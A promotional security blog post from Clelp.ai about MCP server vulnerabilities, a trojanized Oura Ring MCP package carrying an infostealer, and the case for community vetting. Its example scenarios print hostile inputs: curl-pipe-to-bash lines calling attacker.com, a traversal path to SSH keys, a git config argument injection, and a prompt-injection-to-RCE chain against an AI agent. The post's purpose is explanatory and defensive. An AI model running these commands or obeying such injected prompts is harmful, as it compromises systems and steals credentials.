The Hook: When "Official" Doesn't Mean "Safe"

Between February 11 and 17, 2026, security researchers disclosed three critical remote code execution vulnerabilities in Anthropic's official Git MCP server. CVE-2025-68145, CVE-2025-68143, and CVE-2025-68144. Full system compromise from a crafted prompt.

This isn't some random GitHub repository from an unknown developer. This is Anthropic. The company that built Claude. The primary architect of the Model Context Protocol itself.

If they shipped RCE bugs in their official server, what does that tell us about the other 66,000+ skills in the MCP ecosystem?

The Context: Explosive Growth, Minimal Vetting

The numbers are staggering.

The MCP ecosystem hit 66,000+ total skills in February 2026. That's 113% growth in a single week. SkillsMP alone added 8,500 skills in five days—a 14.7% growth rate. New packages go live every hour.

Security vetting rate? Near zero.

Auto-indexing registries pull packages directly from GitHub and npm with little to no review. No mandatory code audits. No dependency scanning. No behavioral analysis. Just volume and speed.

And according to Tenable's 2026 Cloud and AI Security Risk Report, 70% of organizations integrate AI and MCP packages without central security oversight. They don't know what's deployed. Security teams cannot protect what they cannot see.

The math is brutal. If even 1% of those 66,000 skills have exploitable vulnerabilities—a conservative estimate—that's 660 potential attack vectors. Developers are expected to audit each one manually.

In practice, almost nobody does.

This isn't theoretical anymore. The SmartLoader supply chain attack proved it. Between February 15 and 18, attackers deployed a trojanized Oura Ring MCP server using fake GitHub accounts to manufacture trust signals. Stars, forks, contributor activity—all fabricated. The malicious package sat side-by-side with legitimate versions in registries. No visual distinction.

Developers searching for "Oura Ring MCP" downloaded malware thinking it was community-vetted. The payload? StealC infostealer. AWS keys, Azure tokens, SSH credentials, browser passwords, cryptocurrency wallets. Everything.

Fake GitHub stars actually work. Trust signal manipulation scales.

The Analysis: What These CVEs Actually Do

Let's get technical. These aren't minor bugs.

CVE-2025-68145: Prompt Injection to RCE

Malicious prompts can inject commands into git operations. An attacker who controls or influences the prompt sent to an AI agent using the Git MCP server can execute arbitrary shell commands. The commands run with the privileges of the MCP server process.

Example scenario: You ask Claude to show you recent commits in a project repository. A crafted prompt injects ; curl attacker.com/exfil.sh | bash into the git command execution context. Full system compromise. No user interaction required beyond the initial query.

CVE-2025-68143: Path Validation Bypass

Insufficient validation of file paths allows directory traversal attacks. Attackers escape the repository sandbox and access arbitrary filesystem locations. Combined with git operations like clone, pull, or checkout, this enables reading sensitive files or writing malicious content outside the intended boundary.

Example: A crafted repository path like ../../../../.ssh/id_rsa bypasses restrictions. The MCP server operates on files it should never touch. Credential theft, configuration exfiltration, privilege escalation preparation.

CVE-2025-68144: Unrestricted git_init and Argument Injection

The git_init operation lacks proper input sanitization. Attackers can initialize repositories with malicious configurations, hooks, or submodules. Git hooks execute arbitrary code when triggered. Argument injection enables operations like --upload-pack for RCE or --config for persistent backdoors.

Example: Initialize a repository with a malicious post-checkout hook that downloads and executes a payload whenever the repository is updated. Or inject --config core.sshCommand="curl attacker.com/payload.sh | bash" to hijack future git operations.

The Attack Chain

These vulnerabilities stack. An attacker can chain them for maximum impact.

Step one: Use prompt injection to initiate a malicious git operation.
Step two: Leverage path validation bypass to write a malicious git hook outside the intended scope.
Step three: Use unrestricted git_init to configure the repository to execute that hook automatically.

Result: Full system compromise from a single crafted prompt. The victim never sees it coming.

The Implications: The Trust Gap Is Real

Anthropic is not a random developer. They have resources, security expertise, and reputation at stake. And yet their official server shipped with three RCE vulnerabilities.

This creates a fundamental shift in how developers must approach the MCP ecosystem.

Before these disclosures:
"I trust Anthropic's official servers. Third-party skills are the risky ones."

After these disclosures:
"If Anthropic's own servers have RCE bugs, how can I trust ANY third-party skill?"

The implication is clear. Security cannot be outsourced to brand reputation or "official" status. Even well-resourced organizations with security teams and bug bounty programs ship vulnerable code.

And the Anthropic CVEs aren't isolated. The same vulnerability report identified issues in Microsoft's MarkItDown MCP server. This is a systemic ecosystem problem. Large, well-resourced organizations are treating MCP servers as simple integrations rather than high-risk attack surfaces.

The developer assumption is: "It's just connecting to APIs. What could go wrong?"

The reality is: MCP servers execute with full privileges of the host system and handle untrusted input. AI-generated prompts. User queries. External data sources. Every one is a potential injection vector.

Combine the Anthropic CVEs with Tenable's data and the picture gets worse:

• 86% of organizations host third-party code with critical-severity vulnerabilities.
• 13% deploy packages with known compromise history.
• 70% lack central security oversight.

Organizations are running vulnerable MCP servers in production right now. No monitoring. No patch management. No incident response capability. The Anthropic CVEs are not theoretical. They are active in production environments.

The Solution Space: Community Vetting as Infrastructure

The core problem is scale. 66,000+ skills is too large for any individual or team to audit. New skills are added daily. Most developers lack the time, tools, or training to conduct security reviews.

Automated scanning helps, but it's not enough. Static analysis misses logic flaws. Dependency audits don't catch novel attack patterns. Behavioral analysis only works if you know what malicious behavior looks like.

The solution is community vetting as ecosystem infrastructure.

Not vendor lock-in. Not competitive moats. Infrastructure. The kind of security review layer that benefits everyone regardless of which registry they use.

Here's what that looks like in practice:

Human + AI Review Layer

Every skill submission goes through manual curation, not automated indexing. Basic security checks: dependency auditing, author verification, behavioral analysis. Flagging systems for suspicious patterns like obfuscated code, unusual network calls, credential access requests.

Community-Driven Security Ratings

Users rate skills based on actual usage experience, not just GitHub stars. Security concerns surface through reviews before widespread adoption. Transparent issue reporting and advisory systems. When vulnerabilities are found, coordinated disclosure processes kick in. Rapid takedown capability for confirmed malicious packages. Post-incident transparency reports.

Clear Attribution and Provenance

Original author and repository links verified and displayed. Changelog tracking to detect unauthorized modifications. Fork relationships mapped to prevent namespace confusion attacks. If someone forks the "Oura Ring MCP" and adds malware, users see it before installation.

Interoperable Security Signals

This isn't about one directory getting it right. It's about cross-registry vulnerability sharing. Security-first standards for registries, not just growth-first metrics. Developer education that emphasizes supply chain risk, not just feature discovery.

Clelp's model is one approach. We manually curate 1,700+ skills—2.5% of the total ecosystem. Every submission reviewed. Community ratings from actual users. Transparency in security issues and takedowns.

This is not a scalability brag. It's a deliberate trade-off: quality and security over volume and speed. In a 66,000+ skill ecosystem, curation is the filter that makes discovery useful rather than dangerous.

But Clelp isn't the only answer. Other registries are adopting similar models. The critical requirement is that someone in the chain applies human judgment and security review before skills reach production environments.

The Path Forward

The Anthropic CVEs are a wake-up call, not a death sentence for the MCP ecosystem.

The technology is powerful. The use cases are real. The growth is justified. But the security model needs to catch up with the scale.

Developers need to shift from trust-by-default to verify-by-default. Official doesn't mean safe. High star count doesn't mean audited. Fast growth doesn't mean secure.

Community vetting, security-first registries, and transparent disclosure processes aren't optional anymore. They're foundational infrastructure. The sooner the ecosystem adopts them, the healthier it becomes.

If you're building with MCP skills right now, ask three questions before installation:

1. Has this skill been reviewed by someone other than the author?
2. Are there community ratings or security advisories available?
3. If something goes wrong, is there a clear reporting and takedown process?

If the answer to any of those is "no," proceed with extreme caution.

The MCP ecosystem has immense potential. But potential without security is just risk at scale. Community vetting is how we close the gap.

---

About Clelp.ai

Clelp curates and rates AI skills and MCP servers with a focus on security, quality, and community trust. We review every submission manually, surface security concerns transparently, and provide coordinated disclosure for vulnerabilities. Explore vetted skills at clelp.ai.